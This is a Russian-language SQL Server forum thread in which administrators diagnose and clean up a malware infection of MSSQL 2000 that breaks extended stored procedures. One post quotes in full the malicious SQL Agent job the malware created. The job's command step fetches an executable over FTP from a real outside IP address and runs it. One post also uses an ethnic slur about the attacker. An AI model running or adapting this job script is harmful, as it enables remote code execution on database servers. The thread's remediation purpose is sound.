Добро пожаловать в форум, Guest  >>   Войти | Регистрация | Поиск | Правила | В избранное | Подписаться
Все форумы / Microsoft SQL Server Новый топик    Ответить
 Помогите решить проблему. MSSQL 2000  [new]
DreamHunter_ua
Member

Откуда:
Сообщений: 5
вчера пробовал через enterprise manager приатачить БД и когда пытался указать путь к файлам в диалоге получил следующую ошибку:
Заголовок ошибки - Microsoft SQL-DMO (ODBC SQLState: 42000)
Сама ошибка
---------------------------
Error 0: Cannot load the DLL AttackScanner via Gothin, 2011., or one of the DLLs it references. Reason: 126(Не найден указанный модуль.).
может кто сталкивался с подобной ситуацией хелп плиз 2 день не могу побороть
5 июл 11, 11:26    [10923030]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
alexeyvg
Member

Откуда: Moscow
Сообщений: 31983
DreamHunter_ua
вчера пробовал через enterprise manager приатачить БД и когда пытался указать путь к файлам в диалоге получил следующую ошибку
select @@version + версия enterprise manager.
5 июл 11, 11:41    [10923154]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
alexeyvg
Member

Откуда: Moscow
Сообщений: 31983
DreamHunter_ua
DLL AttackScanner via Gothin
Вообще странное название DLL для сиквела :-)
5 июл 11, 11:41    [10923160]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
DreamHunter_ua
Member

Откуда:
Сообщений: 5
alexeyvg,
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 6.1 (Build 7601: Service Pack 1)

Microsoft SQL Enterprise Manager
Microsoft Corporation
Версия: 8.0
5 июл 11, 11:50    [10923257]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
DreamHunter_ua
Member

Откуда:
Сообщений: 5
alexeyv
да мне тоже кажется странным,
мне кажется что он не может подгрузить какую то библиотеку отвечающую за построение дерева файлов и папок
5 июл 11, 11:51    [10923272]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Crimean
Member

Откуда:
Сообщений: 13147
ошибка сиквельная. но 99.9% не от попытки атачить базу. надо атачить базу - просто выполните в квере sp_attach_db, параметры в msdn возьмете. хотя... если там стоит какая-нить хитроисокпаемая система аффтарской защиты...
5 июл 11, 20:58    [10927978]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
pkarklin
Member

Откуда: Москва (Муром)
Сообщений: 74930
автор
и когда пытался указать путь к файлам в диалоге


Приводит к вызову расширенной хп (читай DLL) службой SQL Server. Я бы начал с проверки системы на предмет заразы...
5 июл 11, 21:13    [10928002]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
DreamHunter_ua
Member

Откуда:
Сообщений: 5
pkarklin,
проверил систему трижды на предмет заразы никого не нашел.....
6 июл 11, 09:51    [10929676]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
evgen21
Member

Откуда:
Сообщений: 2
Решилась ли проблема?
Сам с такой столкнулся и понять не могу что делать
10 окт 11, 16:30    [11414265]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
DreamHunter_ua
Member

Откуда:
Сообщений: 5
evgen21
Решилась ли проблема?
Сам с такой столкнулся и понять не могу что делать

нет проблема не решилась помогла только полная переустановка сервака
10 окт 11, 16:35    [11414328]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Winnipuh
Member [заблокирован]

Откуда: Київ
Сообщений: 10428
хмм

Aliases of Gothic.Intruder (AKA):
[Kaspersky] Backdoor.Delf.ie
[McAfee] New BackDoor1
[Panda] Backdoor Program
[Computer Associates] Backdoor/Delf.ie

http://www.exterminate-it.com/malpedia/remove-gothic-intruder


http://www.sqlteam.com/forums/topic.asp?TOPIC_ID=160345
10 окт 11, 16:42    [11414419]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
АлександрЛунинец
Member

Откуда:
Сообщений: 1
Аналогичная проблема.
Заразы не обнаружили никакой.
Проблемы с дисковым пространством и самими жесткими дисками НЕТ
На резервном сервере столкнувшись с аналогичной проблемой удалил MSSQL2000+Reboot+Install MMSQL2000+sp4.
Проблема решилась.

На рабочем сервере ввиду трудоемкости настроек репликаций и всякой фигни решено начать процесс "лечения" с наката поверх только дистрибутива sp4.

Сразу же после перестановки проблема присутствует.
Но минут через 5 все заработало как мае быть...

Ждемс повторов, так сказать...

Сообщение об ошибке не понятно каким боком относится к MSSQL, но тем не менее
проблему считаю не решенной...
13 ноя 11, 19:16    [11589399]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Олег54321
Guest
Олег
Аналогичная проблема.В Documents and Settings нашел три зараженых файла hex1433.exe,
onf1433.dat,onfvip1433.dat
В master > extended stored procedures В свойствах процедуры xp_cmdshell указан путь
AttackScanner via Gothin, 2011.
Разбераюсь дальше.
29 ноя 11, 11:42    [11676233]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Олег54321
Guest
Всем привет!
Вроде разобрался. Сразу хочу предупредить на антивирусные программы не надейтесь.Они
его пока не видят. Тело надо искать вручную или это запускается удалено. Проверте не
появилась ли у вас неизвестная учетная запись. У меня появилась.Я ее заблокировал.
Еще удалось вытянуть скрипт из job который создает вирус и ведет он куссскоглазому китайцу. Вот он:
BEGIN TRANSACTION
DECLARE @JobID BINARY(16)
DECLARE @ReturnCode INT
SELECT @ReturnCode = 0
IF (SELECT COUNT(*) FROM msdb.dbo.syscategories WHERE name = N'[Uncategorized (Local)]') < 1
EXECUTE msdb.dbo.sp_add_category @name = N'[Uncategorized (Local)]'

-- Delete the job with the same name (if it exists)
SELECT @JobID = job_id
FROM msdb.dbo.sysjobs
WHERE (name = N'Microsofts.exe')
IF (@JobID IS NOT NULL)
BEGIN
-- Check if the job is a multi-server job
IF (EXISTS (SELECT *
FROM msdb.dbo.sysjobservers
WHERE (job_id = @JobID) AND (server_id <> 0)))
BEGIN
-- There is, so abort the script
RAISERROR (N'Unable to import job ''Microsofts.exe'' since there is already a multi-server job with this name.', 16, 1)
GOTO QuitWithRollback
END
ELSE
-- Delete the [local] job
EXECUTE msdb.dbo.sp_delete_job @job_name = N'Microsofts.exe'
SELECT @JobID = NULL
END

BEGIN

-- Add the job
EXECUTE @ReturnCode = msdb.dbo.sp_add_job @job_id = @JobID OUTPUT , @job_name = N'Microsofts.exe', @owner_login_name = N'sa', @description = N'No description available.', @category_name = N'[Uncategorized (Local)]', @enabled = 1, @notify_level_email = 0, @notify_level_page = 0, @notify_level_netsend = 0, @notify_level_eventlog = 2, @delete_level= 0
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback

-- Add the job steps
EXECUTE @ReturnCode = msdb.dbo.sp_add_jobstep @job_id = @JobID, @step_id = 1, @step_name = N'1', @command = N'cmd /c echo open 60.173.12.163>c:\RECYCLER\zyMicrosofts.exe&echo xzz>>c:\RECYCLER\zyMicrosofts.exe&echo xzz5060..>>c:\RECYCLER\zyMicrosofts.exe&echo get Microsofts.exe c:\RECYCLER\stMicrosofts.exe>>c:\RECYCLER\zyMicrosofts.exe&echo bye>>c:\RECYCLER\zyMicrosofts.exe&ftp -s:c:\RECYCLER\zyMicrosofts.exe&if EXIST c:\RECYCLER\stMicrosofts.exe (start c:\RECYCLER\stMicrosofts.exe)&del c:\RECYCLER\zyMicrosofts.exe&exit', @database_name = N'', @server = N'', @database_user_name = N'', @subsystem = N'CMDEXEC', @cmdexec_success_code = 0, @flags = 0, @retry_attempts = 0, @retry_interval = 0, @output_file_name = N'', @on_success_step_id = 0, @on_success_action = 1, @on_fail_step_id = 0, @on_fail_action = 2
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
EXECUTE @ReturnCode = msdb.dbo.sp_update_job @job_id = @JobID, @start_step_id = 1

IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback

-- Add the Target Servers
EXECUTE @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @JobID, @server_name = N'(local)'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback

END
COMMIT TRANSACTION
GOTO EndSave
QuitWithRollback:
IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION
EndSave:

Кому интересно скопируйете и вставьте в анализатор запросов будет удобней читать запускать не надо. Так вот пытается он потключится к FTP серверу на ip 60.173.12.163
Сам проверял порт открыт,а так же порты Radmin,RDP,MSsql.
Надо бы его наказать.
Теперь выкладываю скрипт на исправление у меня все получилось проверте все
расширенные процедуры на путь. У меня увидите в скрипте. sp_password там не должно быть
поетому ее надо удалить и создать в обычных. Переустанавливать ничего не надо.

DBCC dropextendedproc ("xp_cmdshell")
DBCC addextendedproc ("xp_cmdshell", "xplog70.dll")

DBCC dropextendedproc ("xp_dirtree")
DBCC addextendedproc ("xp_dirtree", "xpstar.dll")

DBCC dropextendedproc ("sp_OACreate")
DBCC addextendedproc ("sp_OACreate", "odsole70.dll")

DBCC dropextendedproc ("sp_OAMethod")
DBCC addextendedproc ("sp_OAMethod", "odsole70.dll")

DBCC dropextendedproc ("sp_OASetProperty")
DBCC addextendedproc ("sp_OASetProperty", "odsole70.dll")

DBCC dropextendedproc ("xp_regdeletekey")
DBCC addextendedproc ("xp_regdeletekey", "xpstar.dll")

DBCC dropextendedproc ("xp_regread")
DBCC addextendedproc ("xp_regread", "xpstar.dll")

DBCC dropextendedproc ("xp_regwrite")
DBCC addextendedproc ("xp_regwrite", "xpstar.dll")

DBCC dropextendedproc ("sp_password")

create procedure sp_password
@old sysname = NULL, -- the old (current) password
@new sysname, -- the new password
@loginame sysname = NULL -- user to change password on
as
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @self int
select @self = CASE WHEN @loginame is null THEN 1 ELSE 2 END

-- RESOLVE LOGIN NAME
if @loginame is null
select @loginame = suser_sname()

-- CHECK PERMISSIONS (SecurityAdmin per Richard Waymire) --
IF (not is_srvrolemember('securityadmin') = 1)
AND not @self = 1
begin
dbcc auditevent (107, @self, 0, @loginame, NULL, NULL, NULL)
raiserror(15210,-1,-1)
return (1)
end
ELSE
begin
dbcc auditevent (107, @self, 1, @loginame, NULL, NULL, NULL)
end

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_password')
return (1)
end

-- RESOLVE LOGIN NAME (disallows nt names)
if not exists (select * from master.dbo.syslogins where
loginname = @loginame and isntname = 0)
begin
raiserror(15007,-1,-1,@loginame)
return (1)
end

-- IF non-SYSADMIN ATTEMPTING CHANGE TO SYSADMIN, REQUIRE PASSWORD (218078) --
if (@self <> 1 AND is_srvrolemember('sysadmin') = 0 AND exists
(SELECT * FROM master.dbo.syslogins WHERE loginname = @loginame and isntname = 0
AND sysadmin = 1) )
SELECT @self = 1

-- CHECK OLD PASSWORD IF NEEDED --
if (@self = 1 or @old is not null)
if not exists (select * from master.dbo.sysxlogins
where srvid IS NULL and
name = @loginame and
( (@old is null and password is null) or
(pwdcompare(@old, password, (CASE WHEN xstatus&2048 = 2048 THEN 1 ELSE 0 END)) = 1) ) )
begin
raiserror(15211,-1,-1)
return (1)
end

-- CHANGE THE PASSWORD --
update master.dbo.sysxlogins
set password = convert(varbinary(256), pwdencrypt(@new)), xdate2 = getdate(), xstatus = xstatus & (~2048)
where name = @loginame and srvid IS NULL

-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
exec('use master grant all to null')

-- FINALIZATION: RETURN SUCCESS/FAILURE --
if @@error <> 0
return (1)
raiserror(15478,-1,-1)
return (0) -- sp_password

GO

PS. Если кто найдет этот вирус отпишитесь.
2 дек 11, 17:50    [11698144]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
borianckov
Member

Откуда: Клин
Сообщений: 2
У меня похожая проблема была, но с Вашими советами она устранена... Спасибо!
5 дек 11, 03:15    [11704414]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Kuskov
Member

Откуда:
Сообщений: 1
мое решение проблемы через SQL Manager:
1. Вирус переименовывает файлы в каталоге c:\Program Files\Microsoft SQL Server\MSSQL\Binn\
xplog70.dll в xpodse90.dll
xpweb70.dll в xpodse91.dll
возвращаем назад
2. удаляет процедуру
database "master" Extended stored Procedures "xp_fileexist"
восстанавливаем ее
path "xpstar.dll"
permissions "public" -- exec
3. восстанавливаем процедуры в свойствах которых указан "AttackScanner via Gothin, 2011."
у меня их было две
xp_cmdshell указываем path xplog70.dll
xp_redread указываем xpstar.dll

все даже перезапуск SQL сервера не нужен
20 дек 11, 08:46    [11793559]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Maksiiim
Member

Откуда:
Сообщений: 1
Олег54321,
Та же проблема..
А как запустить данный скрипт?
26 дек 11, 11:41    [11825088]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
oleg54321
Guest
Maksiiim,
Надо скопировать и вставить в Query Analyzer.Затем нажать Execute Query или F5.
28 дек 11, 10:33    [11837324]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
Yura_YV
Member

Откуда:
Сообщений: 1
Запишите меня в ряды жертв вируса.
Вылечился по инструкциию
P.S: у меня еще и "CMD" запустить не дает.
14 янв 12, 14:38    [11904090]     Ответить | Цитировать Сообщить модератору
 Re: Помогите решить проблему. MSSQL 2000  [new]
oleg54321
Guest
Yura_YV,
Для запуска cmd прверте параметры реестра.

1 "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor в параметре "Autorun" было значение
"EXIT", оставил пустое значение проблема ушла!
2 HKEY_CURRENT_USER>>Console>>FullScreen = 0

3 удалите параметры cmd.exe и regedit.exe в разделе реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
4 HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
Значение должно быть "%1" %*
5 Переменные среды проверить:
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
path %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;
ComSpec %SystemRoot%\system32\cmd.exe
6 [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001 -отключает cmd
"DisableCMD"=dword:00000000 - включает cmd
16 янв 12, 16:31    [11912390]     Ответить | Цитировать Сообщить модератору
Все форумы / Microsoft SQL Server Ответить